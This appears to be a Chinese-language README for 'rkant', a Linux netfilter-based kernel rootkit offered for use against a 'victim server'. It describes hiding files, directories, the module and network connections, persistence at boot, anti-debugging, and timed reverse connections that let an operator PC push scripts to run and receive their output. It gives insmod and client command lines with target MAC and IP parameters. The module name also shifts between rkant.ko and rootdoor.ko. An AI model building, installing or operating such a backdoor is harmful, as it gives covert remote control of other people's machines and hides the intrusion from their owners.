rkant = rootkit ant,它是利用netfilter hook开发的一款linux后门rootkit程序。
rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu上面测试通过。
功能:
1、任意端口复用。端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录,用linux工具无法查看到。防删除。
3、隐藏模块,开机启动,防发现。
4、反向连接。服务器定时连接指定的ip/port。
5、隐藏网络连接/端口,反调试,防止被跟踪和破解。内容加密传送。
rkant.ko设计要点:
1、安装时,会隐藏式启动一个后门进程(antclient)。
2、在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息,直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时,可传送需要执行的脚本比如sh /home/freeman/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。
安装说明:
1.将rkant.ko/antclient放到server的home/freeman目录下面。
2.将antkeeper放到客户机上面,任何一个目录均可。
在server中,如果用的是eth1,那么,安装参数是:
insmod rootdoor.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8 //damc/dip是目标机(client pc)的mac和ip,它是虚拟机2
antkeeper运行方法:
./antkeeper 192.168.2.8 192.168.2.113 //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就不填,留空。